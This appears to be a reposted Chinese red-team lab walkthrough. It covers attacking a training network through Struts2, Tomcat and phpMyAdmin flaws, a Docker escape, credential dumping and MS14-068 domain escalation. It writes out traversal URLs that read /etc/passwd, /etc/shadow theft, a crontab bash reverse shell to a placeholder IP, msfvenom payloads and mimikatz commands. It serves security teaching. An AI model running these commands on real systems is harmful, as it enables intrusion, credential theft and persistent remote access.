添加仅主机网卡vmnet2,192.168.183.0/24
DHCP:192.168.183.128—192.168.183.255
账号密码
administrator:Test2008
IP地址
192.168.183.128
账号密码
ubuntu:ubuntu
IP地址
192.168.183.129
192.168.0.106
账号密码
douser:Dotest123
IP地址
192.168.183.130
获取服务器开启22、2001、2002、2003端口
2001:文件上传页面
2002:Tomcat默认页面
2003:phpmyadmin页面
太菜了,直接上扫描器,扫一下
2001出现Struts2漏洞
2002出现Tomcat文件上传漏洞
2003未扫描到漏洞
Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 id)的属性值进行二次表达式解析,因此在某些场景下将可能导致远程代码执行。
特征:
1、查看HTTP响应头中是否包含X-Struts-Version字段
2、检查URL中是否包含.action或.do后缀
3、查看错误页面是否包含"Struts Problem Report"等字样
4、检查是否存在/struts/webconsole.html路径
默认页面暴漏的版本是8.5.19
可能造成影响的漏洞:CVE-2017-12615、CVE-2017-12617、CVE-2017-5664
phpmyadmin获取shell方法
1、SQL命令执行获取webshell(要有文件写入权限、知道网站绝对路径、目录可写)
2、日志文件写入webshell
3、CVE-2018-12613
4、CVE-2018-19968
CVE-2018-12613 是 PHPMyAdmin 4.8.0 到 4.8.3 版本中存在的一个高危漏洞,允许攻击者通过精心构造的请求读取服务器上的任意文件。
漏洞存在于index.php文件中对target参数的处理过程中,由于对包含文件路径的验证不足,导致攻击者可以通过目录遍历读取服务器上的敏感文件。
查看etc/passwd
http://192.168.0.105:2003/index.php?target=db_structure.php%253f/../../../../../../../../etc/passwd
http://192.168.0.105:2003/index.php?target=db_structure.php%253f/../../../../../../../../tmp/sess_cookie
ls -alh /.dockerenv #判断根目录是否存在.dockerenv文件
cat /proc/1/cgroup #检查/proc/1/cgroup是否含有docker字符串
fdisk -l #查看可挂载的磁盘
mkdir /test #创建一个目录
mount /dve/sda1 /test #将磁盘挂载到创建的目录
cd /test #切换到创建的目录
ls #查看
cat /etc/shadow #查看etc/passwd
将shadow导出,使用john破解,使用ssh登录
fdisk -l #查看可挂载的磁盘
mkdir /test #创建一个目录
mount /dve/sda1 /test #将磁盘挂载到创建的目录
写入计划任务
touch /test/test.sh
echo "bash -i >& /dev/tcp/IP/端口 0>&1" >/test/test.sh
echo "* * * * * root bash /test.sh" >> /test/etc/crontab
监听端口,等待shell
nc -lvvp 9898
生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=端口 -f elf > XXX.elf
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost xx.xx.xx
set lport 端口
run
mimikatz.exe
sekurlsa::logonpasswords #导出密码
获取域成员SID
漏洞简介:
MS14-068 是 Microsoft Windows 中 Kerberos 实现的一个严重漏洞,影响所有 Windows 域控服务器。
受影响系统:
Windows Server 2003 SP2
Windows Server 2008 SP2/R2 SP1
Windows Server 2012/R2
Windows 7/8/8.1
基本利用步骤:
1、获取普通域用户凭证
2、使用工具生成伪造的TGT票证
3、将伪造票证注入当前会话
4、获取域管理员权限
原文始发于微信公众号(破晓信安):ATT&CK实战系列-红队实战(四)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论